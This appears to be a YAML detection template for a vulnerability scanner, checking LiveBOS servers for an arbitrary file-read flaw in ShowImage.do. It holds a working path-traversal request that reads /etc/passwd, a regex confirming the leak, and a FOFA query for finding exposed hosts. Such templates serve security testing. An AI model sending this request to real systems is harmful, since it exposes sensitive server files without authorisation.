id: livebos-showimage-fileread

info:
  name: LiveBOS ShowImage.do 任意文件读取漏洞
  author: zan8in
  severity: high
  verified: true
  description: |
    LiveBOS ShowImage.do 接口存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器中的敏感文件
    FOFA: app="LiveBOS-框架"
  tags: livebos,fileread
  created: 2023/09/05

rules:
  r0:
    request:
      method: GET
      path: /feed/ShowImage.do;.js.jsp?type=&imgName=../../../../../../../../../../../../../../../etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()